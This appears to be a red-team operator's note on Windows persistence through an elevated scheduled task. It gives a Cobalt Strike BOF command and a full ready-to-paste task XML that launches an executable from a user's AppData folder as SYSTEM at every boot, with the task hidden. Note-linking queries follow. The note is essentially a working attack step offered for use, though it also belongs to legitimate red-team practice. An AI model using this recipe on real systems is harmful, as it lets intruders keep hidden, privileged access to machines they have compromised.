Scheduled Task (Elevated) Persistence

Technique Info

1. run bof command (cobaltstrike): schtaskscreate \Beacon XML CREATE
2. paste in:

<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
	<Triggers>
		<BootTrigger>
			<Enabled>true</Enabled>
		</BootTrigger>
	</Triggers>
	<Principals>
		<Principal>
			<UserId>NT AUTHORITY\SYSTEM</UserId>
			<RunLevel>HighestAvailable</RunLevel>
		</Principal>
	</Principals>
	<Settings>
		<AllowStartOnDemand>true</AllowStartOnDemand>
		<Enabled>true</Enabled>
		<Hidden>true</Hidden>
	</Settings>
	<Actions>
		<Exec>
			<Command>C:\Users\robb.stark\AppData\Local\Microsoft\WindowsApps\projectapa.exe</Command>
		</Exec>
	</Actions>
</Task>

• schtaskscreate depends on https://github.com/trustedsec/CS-Remote-OPs-BOF

Related

Related Notes

All Related Notes

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows") OR contains(tags, "persistence") OR contains(tags, "elevated")
SORT file.ctime DESC

windows

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows")
SORT file.ctime DESC

persistence

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "persistence")
SORT file.ctime DESC

elevated

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "elevated")
SORT file.ctime DESC